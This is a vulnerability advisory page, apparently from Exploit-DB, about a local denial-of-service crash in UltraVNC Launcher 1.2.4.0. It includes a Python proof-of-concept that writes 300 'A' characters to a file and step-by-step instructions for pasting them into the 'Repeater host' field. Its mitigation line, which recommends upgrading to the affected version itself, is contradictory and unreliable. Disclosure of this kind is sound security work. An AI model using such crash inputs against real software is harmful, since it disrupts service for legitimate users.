UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)

vendor:

UltraVNC Launcher

by:

chuyreds

7.8

CVSS

HIGH

Local

N/A

CWE

Product Name: UltraVNC Launcher

Affected Version From: 1.2.4.0

Affected Version To: 1.2.4.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro x64 es

2020

UltraVNC Launcher 1.2.4.0 – ‘RepeaterHost’ Denial of Service (PoC)

UltraVNC Launcher 1.2.4.0 is prone to a denial-of-service vulnerability. An attacker can exploit this issue by supplying a specially crafted input to the 'RepeaterHost' field, which will cause the application to crash. This may allow the attacker to deny service to legitimate users.

Mitigation:

Upgrade to the latest version of UltraVNC Launcher 1.2.4.0

Source

Exploit-DB raw data:

# Exploit Title:  UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Repeater host" Paste Clipboard
#6.- Click on "OK"
#7.- Crashed

cod = "\x41" * 300

f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
f.write(cod)
f.close()